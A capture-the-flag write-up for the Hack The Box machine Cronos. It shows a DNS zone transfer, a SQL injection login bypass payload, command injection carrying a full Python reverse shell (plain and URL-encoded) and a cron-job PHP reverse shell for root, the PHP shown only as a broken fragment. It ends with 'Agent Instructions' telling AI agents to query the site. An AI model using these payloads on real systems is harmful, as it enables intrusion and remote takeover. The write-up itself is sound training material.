# Cronos ## Service Enumeration `nmapAutomator.sh -H 10.10.10.13 -t all` ![](/files/-MadsuhDPh9cSP6QZ00k) We can perform a DNS zone transfer, guessing that the domain is `cronos.htb`: `dig axfr @10.10.10.13 cronos.htb` ![](/files/-MadsyBjxBM22rS05PbC) Here, we uncover some subdomains for `10.10.10.13`. Let's add them to our `/etc/hosts` file. ![](/files/-Madt0H8ovFbyDMaqUWZ) Now, going to [www.cronos.htb](http://www.cronos.htb) and admin.cronos.htb yields a valid webpage. ## Exploitation The `admin.cronos.htb` login page is vulnerable to SQL injection. Using the payload: `username=' or 1=1;#&password=` We can bypass the authentication. Note that this does not work on the password field. ![](/files/-Madt3BBYwWJm1AwFS9I) We get access to the following tool: ![](/files/-Madt5v7VPVJEySt6pUB) If we examine the POST request, we see that `ping -c 1` is sent as the `command parameter`. It is possible that the server is not sanitizing the input and reflecting the `command` parameter into the OS command. ![](/files/-MadtBKAqodEncR-u0Am) Indeed, changing to `-c 2` changes the command executed! ![](/files/-Madt8BwdoVpjBsMRm_C) We now have an RCE vulnerability. Executing the `which python` command shows that Python is installed on the server. ![](/files/-MadtDwFRVb-JmzLmq3x) We can use a Python reverse shell payload: `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'` After URL encoding, we can edit the `command` parameter: `command=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.14.23%22%2C4242%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27&host=` On our Netcat listener, we receive the reverse shell ![](/files/-MadtHH2ZmHyijuDLXIA) ![](/files/-MadtJ_ClyjeZJswg8ZQ) ## Privilege Escalation We can use LinPEAS to enumerate. We find the following cron job that runs every minute: ![](/files/-MadtMSQtB-Sb16a9NOl) The script run is a PHP script: ![](/files/-MadtQtJ2RMyVwOlxB8N) We can change this to our custom PHP payload: ```php $sock, 1=>$sock, 2=>$sock),$pipes); ?> ``` ![](/files/-MadtVp0BnY6RGWfxEba) The next time the cron job is run, we obtain a root shell on our listener. ![](/files/-MadtZusC-iBH64zmlSn) ![](/files/-MadtbNnEz8L0X47d5_Y) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentesting.zeyu2001.com/hack-the-box/medium/cronos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.